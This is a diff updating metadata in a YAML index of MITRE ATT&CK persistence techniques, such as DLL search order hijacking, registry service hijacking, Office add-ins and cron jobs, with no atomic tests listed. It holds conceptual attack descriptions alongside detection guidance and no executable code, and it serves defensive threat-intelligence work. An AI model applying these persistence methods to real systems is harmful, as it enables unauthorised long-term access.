       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27724,11 +28109,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27786,9 +28170,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -27869,12 +28252,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27893,7 +28275,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -27907,7 +28288,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -27934,8 +28314,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27966,7 +28346,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -28023,11 +28404,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28099,9 +28479,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28117,12 +28497,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28197,7 +28576,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28240,7 +28618,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28264,8 +28642,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28420,31 +28796,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28461,6 +28817,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28471,9 +28828,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28481,17 +28842,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28499,79 +28880,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28601,6 +28976,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28611,6 +28987,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28619,13 +28996,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28667,9 +29044,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28737,19 +29111,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -28765,8 +29138,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28780,7 +29153,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -28806,6 +29179,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -28833,42 +29210,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -28883,13 +29229,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -28897,11 +29248,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -28932,7 +29306,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -28970,13 +29344,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29002,7 +29374,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29044,7 +29416,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29122,11 +29493,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
